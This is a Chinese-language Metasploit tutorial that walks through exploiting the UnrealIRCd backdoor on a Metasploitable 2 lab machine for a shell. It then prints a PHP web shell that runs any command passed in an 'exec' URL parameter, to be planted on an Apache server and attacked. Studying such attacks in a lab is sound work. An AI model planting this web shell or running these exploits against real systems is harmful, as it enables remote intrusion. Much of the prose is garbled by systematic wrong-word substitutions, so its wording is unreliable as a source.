Metasploit Framework中有許多裂痕操作模塊,包羅緩沖區(qū)溢出,欣賞器裂痕操作,Web應(yīng)用措施裂痕,后門操作,僵尸經(jīng)受東西等。Exploit開拓者以及對(duì)這個(gè)框架有孝敬的人已經(jīng)分享了許多有趣而且有用的對(duì)象。
這篇文章中,我們將接頭操作Metasploit來進(jìn)攻并經(jīng)受常見的后門和僵尸網(wǎng)絡(luò)的話題。我們不會(huì)深入研究所有的模塊,可是會(huì)提到一些在將來滲透測(cè)試可能事情時(shí)會(huì)用到的模塊。我們不會(huì)開拓Exploit,所以不需要你利用調(diào)試器和代碼編輯器。
假如你剛開始操作Msfconsole(框架的一個(gè)呼吁行接口)來利用Metasploit Framework,不必?fù)?dān)憂,這里會(huì)一步一步地教你怎么利用裂痕操作模塊。這個(gè)教程只需要你做一件事,在你的進(jìn)攻機(jī)上安裝Metasploit,我發(fā)起你利用Kali Linux可能BackBox,這是滲透測(cè)試的刊行版系統(tǒng),已經(jīng)預(yù)先安裝了Metasploit。
對(duì)付我們的方針機(jī),我發(fā)起你把metasploitable 2安裝到喜歡的虛擬化平臺(tái)上,好比VMWare可能VirtualBox。Metasploitable 2是一個(gè)有裂痕的Ubuntun Linux虛擬機(jī),你可以用它操練你的Metasploit利用能力,因?yàn)樗厦姘惭b了一些不安詳?shù)拇胧?

Metasploitable 2虛擬機(jī)設(shè)置安裝了包括有后門和果真裂痕的處事。
在6667端口上,Metasploitable 2上運(yùn)行著有后門的UnreaIRCD IRC靠山措施,可以通過發(fā)送字母“AB”觸發(fā),進(jìn)攻者可以或許以運(yùn)行ircd的用戶權(quán)限執(zhí)行任意系統(tǒng)呼吁。這是一個(gè)很是好的用來操練的裂痕,我們?cè)囋嚳茨懿荒軓棾鲆粋€(gè)shell。很幸運(yùn),Metasploit已經(jīng)有一個(gè)該裂痕的操作模塊,位于exploit/unix/irc/unreal_ircd_3281_backdoor下面。
輸入msfconsole打開Metasploit的呼吁行接口。輸入info exploit/unix/irc/unreal_ircd_3281_backdoor可以看到模塊的描寫信息:“這個(gè)模塊操作裂痕進(jìn)攻一個(gè)附加有惡意后門的Unreal IRCD 3.2.8.1下載包。該后門位于2009年11月到2010年6月12日期間的Unreal3.2.8.1.tar.gz壓縮包中”
此刻,是時(shí)候進(jìn)攻這個(gè)包括有后門的處事了!

哇哦,我們拿到了shell。想要獲取更多關(guān)于其它有后門的處事的信息,請(qǐng)查察Metasploitable 2 Exploitability Guide。
我們接頭的不該該是常見的后門和僵尸網(wǎng)絡(luò)經(jīng)受話題嗎?是的!我們才方才開始,適才做了一個(gè)簡(jiǎn)樸而又簡(jiǎn)短的先容,如何操作MSF節(jié)制臺(tái)來進(jìn)攻UnreaIRCD IRC處事中的后門。
我們的方針是先容一個(gè)新奇的玩意兒,Metasploit已經(jīng)有了這一類模塊,這些模塊并不是在Web應(yīng)用措施上長(zhǎng)途執(zhí)行任意代碼,也不是在應(yīng)用措施或處事長(zhǎng)舉辦緩沖區(qū)溢出進(jìn)攻。
在下一個(gè)例子中,我們將會(huì)利用一個(gè)我寫的Simple Backdoor Shell Remote Code Execution模塊進(jìn)攻一個(gè)Web后門。這個(gè)模塊進(jìn)攻一個(gè)簡(jiǎn)樸的web后門,操作常見后門shell的有懦弱點(diǎn)的參數(shù)執(zhí)行呼吁。
Daniel Miessler和Jason Haddix的OWASP安詳列表工程里有許多這類后門shell的樣本,它們被分類編入到Payloads下面。
在我們探究Simple Backdoor Shell Remote Code Execution模塊之前,我們首先要在方針呆板上建設(shè)一個(gè)后門shell。我發(fā)起你在Linux虛擬機(jī)上安裝一個(gè)Apache處事器,并編寫以下有裂痕的代碼:
<?php
if ( isset( $_GET[‘exec’] ) ) {
if ( false === passthru( $_GET[‘exec’] ) )
echo ‘So sad, this is an error – aurelius of Infosec Institute’;
}
?>
我把這個(gè)代碼放在Ubuntun VM虛擬機(jī)的/var/www/html/msfdev/vulnerable.php路徑下,這樣我可以利用欣賞器會(huì)見http://localhost/msfdev/vulnerable.php,如下圖所示,操作這個(gè)裂痕代碼的POC就可以通過exec參數(shù)執(zhí)行任意呼吁。

此刻,我們利用Simple Backdoor Shell Remote Code Execution模塊。
